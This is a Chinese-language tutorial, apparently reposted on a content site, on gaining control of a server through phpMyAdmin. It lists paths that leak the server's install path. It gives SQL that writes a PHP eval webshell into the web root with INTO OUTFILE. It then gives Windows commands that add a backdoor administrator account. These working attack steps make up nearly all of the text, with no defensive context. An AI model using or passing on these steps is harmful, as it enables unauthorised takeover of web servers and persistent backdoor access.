下面由phpmyadmin/" target="_blank">phpmyadmin教程栏目给大家介绍利用phpmyadmin提权的方法,希望对需要的朋友有所帮助!
利用phpMyAdmin提权
爆路径
/phpmyadmin/libraries/lect_lang.lib.php /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file() /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
写马
Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>"); select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php"; Drop TABLE IF EXISTS a;获得webshell
最后用Cknife连接,创建帐户并添加到管理员用户组net user admin admin /addnet localgroup administrator admin /add
以上就是怎么利用phpMyAdmin提权的详细内容,更多请关注知识资源分享宝库其它相关文章!
版权声明
本站内容来源于互联网搬运,
仅限用于小范围内传播学习,请在下载后24小时内删除,
如果有侵权内容、不妥之处,请第一时间联系我们删除。敬请谅解!
E-mail:dpw1001@163.com
发表评论